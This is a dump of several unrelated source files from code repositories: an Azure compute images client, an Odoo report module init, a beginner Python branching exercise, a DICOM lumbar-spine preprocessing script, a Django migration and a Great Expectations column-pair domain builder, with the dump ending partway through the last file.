        # Both 200 and 201 carry an Image body.
        if response.status_code == 200:
            deserialized = self._deserialize("Image", pipeline_response)

        if response.status_code == 201:
            deserialized = self._deserialize("Image", pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})  # type: ignore

        return deserialized  # type: ignore

    _update_initial.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
    }
    # Typed overload: model payload, JSON body.
    @overload
    def begin_update(
        self,
        resource_group_name: str,
        image_name: str,
        parameters: _models.ImageUpdate,
        *,
        content_type: str = "application/json",
        **kwargs: Any
    ) -> LROPoller[_models.Image]:
        """Update an image.

        :param resource_group_name: The name of the resource group. Required.
        :type resource_group_name: str
        :param image_name: The name of the image. Required.
        :type image_name: str
        :param parameters: Parameters supplied to the Update Image operation. Required.
        :type parameters: ~azure.mgmt.compute.v2022_03_01.models.ImageUpdate
        :keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
         Default value is "application/json".
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns either Image or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
    # Typed overload: raw IO payload, binary body.
    @overload
    def begin_update(
        self,
        resource_group_name: str,
        image_name: str,
        parameters: IO,
        *,
        content_type: str = "application/json",
        **kwargs: Any
    ) -> LROPoller[_models.Image]:
        """Update an image.

        :param resource_group_name: The name of the resource group. Required.
        :type resource_group_name: str
        :param image_name: The name of the image. Required.
        :type image_name: str
        :param parameters: Parameters supplied to the Update Image operation. Required.
        :type parameters: IO
        :keyword content_type: Body Parameter content-type. Content type parameter for binary body.
         Default value is "application/json".
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns either Image or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
    @distributed_trace
    def begin_update(
        self, resource_group_name: str, image_name: str, parameters: Union[_models.ImageUpdate, IO], **kwargs: Any
    ) -> LROPoller[_models.Image]:
        """Update an image.

        :param resource_group_name: The name of the resource group. Required.
        :type resource_group_name: str
        :param image_name: The name of the image. Required.
        :type image_name: str
        :param parameters: Parameters supplied to the Update Image operation. Is either a model type or
         a IO type. Required.
        :type parameters: ~azure.mgmt.compute.v2022_03_01.models.ImageUpdate or IO
        :keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
         Default value is None.
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns either Image or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

        api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
        content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
        cls: ClsType[_models.Image] = kwargs.pop("cls", None)
        polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token: Optional[str] = kwargs.pop("continuation_token", None)
        # Only issue the initial request when not resuming from a continuation token.
        if cont_token is None:
            raw_result = self._update_initial(
                resource_group_name=resource_group_name,
                image_name=image_name,
                parameters=parameters,
                api_version=api_version,
                content_type=content_type,
                cls=lambda x, y, z: x,
                headers=_headers,
                params=_params,
                **kwargs
            )
        kwargs.pop("error_map", None)

        def get_long_running_output(pipeline_response):
            # Deserialize the final polled response into an Image model.
            deserialized = self._deserialize("Image", pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized

        if polling is True:
            polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
        elif polling is False:
            polling_method = cast(PollingMethod, NoPolling())
        else:
            polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore

    begin_update.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
    }
    def _delete_initial(  # pylint: disable=inconsistent-return-statements
        self, resource_group_name: str, image_name: str, **kwargs: Any
    ) -> None:
        """Send the initial DELETE of the delete LRO."""
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})

        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

        api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
        cls: ClsType[None] = kwargs.pop("cls", None)

        request = build_delete_request(
            resource_group_name=resource_group_name,
            image_name=image_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            template_url=self._delete_initial.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response: PipelineResponse = self._client._pipeline.run(  # pylint: disable=protected-access
            request, stream=False, **kwargs
        )

        response = pipeline_response.http_response

        # Delete may complete synchronously (200/204) or asynchronously (202).
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    _delete_initial.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
    }
    @distributed_trace
    def begin_delete(self, resource_group_name: str, image_name: str, **kwargs: Any) -> LROPoller[None]:
        """Deletes an Image.

        :param resource_group_name: The name of the resource group. Required.
        :type resource_group_name: str
        :param image_name: The name of the image. Required.
        :type image_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[None]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

        api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
        cls: ClsType[None] = kwargs.pop("cls", None)
        polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token: Optional[str] = kwargs.pop("continuation_token", None)
        # Only issue the initial request when not resuming from a continuation token.
        if cont_token is None:
            raw_result = self._delete_initial(  # type: ignore
                resource_group_name=resource_group_name,
                image_name=image_name,
                api_version=api_version,
                cls=lambda x, y, z: x,
                headers=_headers,
                params=_params,
                **kwargs
            )
        kwargs.pop("error_map", None)

        def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
            # Delete has no body; only invoke the custom callback if supplied.
            if cls:
                return cls(pipeline_response, None, {})

        if polling is True:
            polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
        elif polling is False:
            polling_method = cast(PollingMethod, NoPolling())
        else:
            polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore

    begin_delete.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
    }
    @distributed_trace
    def get(
        self, resource_group_name: str, image_name: str, expand: Optional[str] = None, **kwargs: Any
    ) -> _models.Image:
        """Gets an image.

        :param resource_group_name: The name of the resource group. Required.
        :type resource_group_name: str
        :param image_name: The name of the image. Required.
        :type image_name: str
        :param expand: The expand expression to apply on the operation. Default value is None.
        :type expand: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: Image or the result of cls(response)
        :rtype: ~azure.mgmt.compute.v2022_03_01.models.Image
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})

        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

        api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
        cls: ClsType[_models.Image] = kwargs.pop("cls", None)

        request = build_get_request(
            resource_group_name=resource_group_name,
            image_name=image_name,
            subscription_id=self._config.subscription_id,
            expand=expand,
            api_version=api_version,
            template_url=self.get.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response: PipelineResponse = self._client._pipeline.run(  # pylint: disable=protected-access
            request, stream=False, **kwargs
        )

        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize("Image", pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    get.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
    }
    @distributed_trace
    def list_by_resource_group(self, resource_group_name: str, **kwargs: Any) -> Iterable["_models.Image"]:
        """Gets the list of images under a resource group.

        :param resource_group_name: The name of the resource group. Required.
        :type resource_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either Image or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.compute.v2022_03_01.models.Image]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

        api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
        cls: ClsType[_models.ImageListResult] = kwargs.pop("cls", None)

        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})

        def prepare_request(next_link=None):
            # First page uses the templated URL; later pages follow next_link.
            if not next_link:
                request = build_list_by_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    api_version=api_version,
                    template_url=self.list_by_resource_group.metadata["url"],
                    headers=_headers,
                    params=_params,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                # make call to next link with the client's api-version
                _parsed_next_link = urllib.parse.urlparse(next_link)
                _next_request_params = case_insensitive_dict(
                    {
                        key: [urllib.parse.quote(v) for v in value]
                        for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
                    }
                )
                _next_request_params["api-version"] = self._config.api_version
                request = HttpRequest(
                    "GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        def extract_data(pipeline_response):
            # Pull one page of Image items plus the link to the next page.
            deserialized = self._deserialize("ImageListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)  # type: ignore
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response: PipelineResponse = self._client._pipeline.run(  # pylint: disable=protected-access
                request, stream=False, **kwargs
            )
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return ItemPaged(get_next, extract_data)

    list_by_resource_group.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images"
    }
    @distributed_trace
    def list(self, **kwargs: Any) -> Iterable["_models.Image"]:
        """Gets the list of Images in the subscription. Use nextLink property in the response to get the
        next page of Images. Do this till nextLink is null to fetch all the Images.

        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either Image or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.compute.v2022_03_01.models.Image]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

        api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
        cls: ClsType[_models.ImageListResult] = kwargs.pop("cls", None)

        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})

        def prepare_request(next_link=None):
            # First page uses the templated URL; later pages follow next_link.
            if not next_link:
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    api_version=api_version,
                    template_url=self.list.metadata["url"],
                    headers=_headers,
                    params=_params,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                # make call to next link with the client's api-version
                _parsed_next_link = urllib.parse.urlparse(next_link)
                _next_request_params = case_insensitive_dict(
                    {
                        key: [urllib.parse.quote(v) for v in value]
                        for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
                    }
                )
                _next_request_params["api-version"] = self._config.api_version
                request = HttpRequest(
                    "GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        def extract_data(pipeline_response):
            # Pull one page of Image items plus the link to the next page.
            deserialized = self._deserialize("ImageListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)  # type: ignore
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response: PipelineResponse = self._client._pipeline.run(  # pylint: disable=protected-access
                request, stream=False, **kwargs
            )
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return ItemPaged(get_next, extract_data)

    list.metadata = {"url": "/subscriptions/{subscriptionId}/providers/Microsoft.Compute/images"}
| [
"noreply@github.com"
] | kurtzeborn.noreply@github.com |
a5c5dcbc94612c0992dd51b396788cba593b0e91 | b224c7413b7e6a1cb78dad60b4899674fefe8269 | /openforce_financial_report/report/__init__.py | f25291a28701b525b54a4b167f885ea54eb1abb4 | [] | no_license | alessandrocamilli/7-openforce-addons | 2ee00b712538a8eb433d0ce0c63cd12a861548e6 | 78fc164679b690bcf84866987266838de134bc2f | refs/heads/master | 2016-08-03T11:58:12.730337 | 2014-07-03T10:29:56 | 2014-07-03T10:29:56 | 21,004,298 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,036 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Alessandro Camilli (a.camilli@yahoo.it)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import partners_due_register
import common_partner_reports
import common_reports
import webkit_parser_header_fix
| [
"alessandrocamilli@openforce.it"
] | alessandrocamilli@openforce.it |
50a2ef5128dd7ed1fe459863cad3a6691fb09054 | 7ae754f51aaf2e6e559b925980c35fe795808537 | /02_分支/hm_07_火车站安检.py | 49c870c4d693840399ef573b305e8d8426bed2bc | [] | no_license | xiaohema233/PythonStart | be113d9359734d17eeb22b0584cf240a128fed3c | 44f98fc6c50f2c85b72ee029ec99d3099459f370 | refs/heads/master | 2022-05-15T19:33:22.363721 | 2022-05-09T06:28:05 | 2022-05-09T06:28:05 | 241,621,051 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 785 | py | # 定义布尔型变量 has_ticket 表示是否有车票
# Boolean flag: whether the passenger holds a ticket.
has_ticket = True

# Length of the knife being carried, in centimetres.
knife_length = 30

# Check the ticket first; only ticket holders proceed to the security check.
if has_ticket:
    print("车票检查通过,准备开始安检")
    # At security, knives longer than 20 cm are not allowed on board.
    if knife_length > 20:
        # Over the limit: report the knife length and refuse boarding.
        print("您携带的刀太长了,有 %d 公分长!" % knife_length)
        print("不允许上车")
    # Within the 20 cm limit: security check passed.
    else:
        print("安检已经通过,祝您旅途愉快!")
# No ticket: refuse entry.
else:
    print("大哥,请先买票")
| [
"33052287+xiaohema233@users.noreply.github.com"
] | 33052287+xiaohema233@users.noreply.github.com |
44132d5bd3147c83d6a97cb746893c629d905bfa | 9c880db9912c35a73469f728245de78459763ce4 | /ProjectCode/DataPreprocess.py | de80744293fdabddd08e68bd8803a6da43957549 | [] | no_license | Lizi2hua/Project-111 | 3a17e396230c76bf47dd8209e801fe5edd079004 | 57dc7e331b5bfa860226e67c6f45de682720df98 | refs/heads/master | 2022-10-20T16:36:47.322765 | 2020-07-14T14:42:03 | 2020-07-14T14:42:03 | 277,501,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,166 | py | #将所有的数据处理函数都包含到此文件下
import SimpleITK as sitk
import os
import json
import glob
import SimpleITK as sitk
import pandas as pd
import matplotlib.pyplot as plt
# --- DICOM data handling helpers ---
def dicom_metainfo(dicm_path, list_tag):
    '''
    Read DICOM metadata values for the requested tags.
    :param dicm_path: path to a DICOM file
    :param list_tag: tag names to look up, e.g. ['0008|0018',]
    :return: list of metadata values, one per tag, in the same order
    '''
    file_reader = sitk.ImageFileReader()
    file_reader.LoadPrivateTagsOn()
    file_reader.SetFileName(dicm_path)
    file_reader.ReadImageInformation()
    values = []
    for tag in list_tag:
        values.append(file_reader.GetMetaData(tag))
    return values
def dicom2array(dcm_path):
    '''
    Read a DICOM file and convert it to a grayscale image (np.array).
    https://simpleitk.readthedocs.io/en/master/link_DicomConvert_docs.html
    :param dcm_path: DICOM file path
    :return: 2-D grayscale array (first slice of the loaded volume)
    '''
    reader = sitk.ImageFileReader()
    reader.SetImageIO('GDCMImageIO')
    reader.SetFileName(dcm_path)
    reader.ReadImageInformation()
    image = reader.Execute()
    # Single-channel images are rescaled to 0-255 8-bit grayscale;
    # MONOCHROME1 photometric interpretation is inverted, so flip it back.
    if image.GetNumberOfComponentsPerPixel() == 1:
        image = sitk.RescaleIntensity(image, 0, 255)
        if reader.GetMetaData('0028|0004').strip() == 'MONOCHROME1':
            image = sitk.InvertIntensity(image, maximum=255)
        image = sitk.Cast(image, sitk.sitkUInt8)
    return sitk.GetArrayFromImage(image)[0]
# --- JSON annotation-file handling helpers ---
def get_info(train_path,json_path):
annotation_info = pd.DataFrame(columns=('studyUid','seriesUid','instanceUid','annotation'))
json_df = pd.read_json(json_path)
for idx in json_df.index:
studyUid = json_df.loc[idx,"studyUid"]
seriesUid = json_df.loc[idx,"data"][0]['seriesUid']
instanceUid = json_df.loc[idx,"data"][0]['instanceUid']
annotation = json_df.loc[idx,"data"][0]['annotation']
row = pd.Series({'studyUid':studyUid,'seriesUid':seriesUid,'instanceUid':instanceUid,'annotation':annotation})
annotation_info = annotation_info.append(row,ignore_index=True)
dcm_paths = glob.glob(os.path.join(train_path,"**","**.dcm"))
tag_list = ['0020|000d','0020|000e','0008|0018']
dcm_info = pd.DataFrame(columns=('dcmPath','studyUid','seriesUid','instanceUid'))
for dcm_path in dcm_paths:
try:
studyUid,seriesUid,instanceUid = dicom_metainfo(dcm_path,tag_list)
row = pd.Series({'dcmPath':dcm_path,'studyUid':studyUid,'seriesUid':seriesUid,'instanceUid':instanceUid })
dcm_info = dcm_info.append(row,ignore_index=True)
except:
continue
result = pd.merge(annotation_info,dcm_info,on=['studyUid','seriesUid','instanceUid'])
result = result.set_index('dcmPath')['annotation'] #返回图片路径与标注信息
return result
# 得到数据(array类型)和标签的函数
def DataLabelGenerator(DATA_PATH,JSON_PATH,idx):
result=get_info(DATA_PATH,JSON_PATH)
#将读图转换为array
img_dir=result.index[idx] #第idx的图片路径
img_arr=dicom2array(img_dir)
#获取标注信息
tags=result[idx]
annoation=tags[0]['data']['point']
#坐标
coord=[]
#脊椎ID
id=[]
#腰间盘
disc=[]
#腰椎
vertebra=[]
for j in range(len(annoation)):
coord_list=annoation[j]['coord']
coord.append(coord_list)
id_name=annoation[j]['tag']['identification']
id.append(id_name)
name=annoation[j]['tag']
vertebra_label=name.get('vertebra')
vertebra.append(vertebra_label)
disc_label=name.get('disc')
disc.append(disc_label)
return img_arr,coord,id,disc,vertebra
# 一下代码是测试,也可以做模板
# DATA_PATH= r"C:\project\lumbar\Project-111\dataset\train_train51"
# JSON_PATH= r"C:\project\lumbar\Project-111\dataset\train_train51/lumbar_train51_annotation.json"
# idx=5
# img_arr,coord,id,disc,vertebra=DataLabelGenerator(DATA_PATH,JSON_PATH,idx)
# print(coord)
# print(img_arr)
# plt.title("{}\'s img ".format(idx))
# for j in coord:
# x,y=j
# plt.scatter(x,y,c='r',s=3)
# plt.imshow(img_arr,cmap='gray')
# plt.show()
| [
"1050100964@qq.com"
] | 1050100964@qq.com |
a9cf8b7863b31cbd9969909edaa8c0ecef6230ee | bfd04e41f0b5b236ef937eb3922a105d00d25ce0 | /db/campaigns/migrations/0001_initial.py | 11a233e848f4766a19dd5444b69249caf5e3acf5 | [
"MIT"
] | permissive | cega/try.wq.io | 5c9dac3f428b2a92c63096f0cb882f264f684b9f | fcb12d5e26a05f6a653f0cf63e668ea1a2f088c2 | refs/heads/master | 2021-06-09T20:41:25.402542 | 2016-11-29T19:41:59 | 2016-11-29T19:41:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,079 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-23 15:59
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.WQ_REPORTSTATUS_MODEL),
migrations.swappable_dependency(settings.WQ_SITE_MODEL),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Campaign',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('slug', models.SlugField()),
('name', models.CharField(max_length=255)),
('icon', models.ImageField(upload_to='campaigns')),
('description', models.TextField()),
],
),
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
],
options={
'ordering': ('-date', 'campaign', 'site'),
},
),
migrations.CreateModel(
name='EventResult',
fields=[
('id', models.PositiveIntegerField(primary_key=True, serialize=False)),
('event_date', models.DateField()),
('result_value_numeric', models.FloatField(blank=True, null=True)),
('result_value_text', models.TextField(blank=True, null=True)),
('result_empty', models.BooleanField(default=False)),
('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.WQ_EVENT_MODEL)),
('event_campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='campaigns.Campaign')),
('event_site', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.WQ_SITE_MODEL)),
],
options={
'db_table': 'wq_eventresult',
'abstract': False,
},
),
migrations.CreateModel(
name='Parameter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, db_index=True, max_length=255)),
('slug', models.CharField(blank=True, max_length=255)),
('is_numeric', models.BooleanField(default=False)),
('units', models.CharField(blank=True, max_length=50, null=True)),
('description', models.TextField()),
('campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='parameters', to='campaigns.Campaign')),
],
options={
'ordering': ['pk'],
},
),
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('entered', models.DateTimeField(blank=True)),
('photo', models.ImageField(blank=True, null=True, upload_to='reports')),
('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='report_set', to=settings.WQ_EVENT_MODEL)),
('status', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.WQ_REPORTSTATUS_MODEL)),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
'ordering': ('-entered',),
},
),
]
| [
"andrew@wq.io"
] | andrew@wq.io |
d9b9389944f741e45759c518f06c672459fe46f7 | a281d09ed91914b134028c3a9f11f0beb69a9089 | /great_expectations/rule_based_profiler/domain_builder/column_pair_domain_builder.py | e7290588875208769d5627b986abc51a6ca0c953 | [
"Apache-2.0"
] | permissive | CarstenFrommhold/great_expectations | 4e67bbf43d21bc414f56d576704259a4eca283a5 | 23d61c5ed26689d6ff9cec647cc35712ad744559 | refs/heads/develop | 2023-01-08T10:01:12.074165 | 2022-11-29T18:50:18 | 2022-11-29T18:50:18 | 311,708,429 | 0 | 0 | Apache-2.0 | 2020-11-10T15:52:05 | 2020-11-10T15:52:04 | null | UTF-8 | Python | false | false | 3,949 | py | from __future__ import annotations
from typing import TYPE_CHECKING, Dict, List, Optional, Union
import great_expectations.exceptions as ge_exceptions
from great_expectations.core.metric_domain_types import MetricDomainTypes
from great_expectations.rule_based_profiler.domain import (
INFERRED_SEMANTIC_TYPE_KEY,
Domain,
SemanticDomainTypes,
)
from great_expectations.rule_based_profiler.domain_builder import ColumnDomainBuilder
from great_expectations.rule_based_profiler.parameter_container import (
ParameterContainer,
)
if TYPE_CHECKING:
from great_expectations.data_context.data_context.abstract_data_context import (
AbstractDataContext,
)
from great_expectations.validator.validator import Validator
class ColumnPairDomainBuilder(ColumnDomainBuilder):
"""
This DomainBuilder uses relative tolerance of specified map metric to identify domains.
"""
def __init__(
self,
include_column_names: Optional[Union[str, Optional[List[str]]]] = None,
data_context: Optional[AbstractDataContext] = None,
) -> None:
"""
Args:
include_column_names: Explicitly specified exactly two desired columns
data_context: AbstractDataContext associated with this DomainBuilder
"""
super().__init__(
include_column_names=include_column_names,
exclude_column_names=None,
include_column_name_suffixes=None,
exclude_column_name_suffixes=None,
semantic_type_filter_module_name=None,
semantic_type_filter_class_name=None,
include_semantic_types=None,
exclude_semantic_types=None,
data_context=data_context,
)
@property
def domain_type(self) -> MetricDomainTypes:
return MetricDomainTypes.COLUMN_PAIR
def _get_domains(
self,
rule_name: str,
variables: Optional[ParameterContainer] = None,
) -> List[Domain]:
"""Return domains matching the specified tolerance limits.
Args:
rule_name: name of Rule object, for which "Domain" objects are obtained.
variables: Optional variables to substitute when evaluating.
Returns:
List of domains that match the desired tolerance limits.
"""
batch_ids: List[str] = self.get_batch_ids(variables=variables)
validator: Validator = self.get_validator(variables=variables)
effective_column_names: List[str] = self.get_effective_column_names(
batch_ids=batch_ids,
validator=validator,
variables=variables,
)
if not (effective_column_names and (len(effective_column_names) == 2)):
raise ge_exceptions.ProfilerExecutionError(
message=f"""Error: Columns specified for {self.__class__.__name__} in sorted order must correspond to \
"column_A" and "column_B" (in this exact order).
"""
)
effective_column_names = sorted(effective_column_names)
domain_kwargs: Dict[str, str] = dict(
zip(
[
"column_A",
"column_B",
],
effective_column_names,
)
)
column_name: str
semantic_types_by_column_name: Dict[str, SemanticDomainTypes] = {
column_name: self.semantic_type_filter.table_column_name_to_inferred_semantic_domain_type_map[
column_name
]
for column_name in effective_column_names
}
domains: List[Domain] = [
Domain(
domain_type=self.domain_type,
domain_kwargs=domain_kwargs,
details={
INFERRED_SEMANTIC_TYPE_KEY: semantic_types_by_column_name,
},
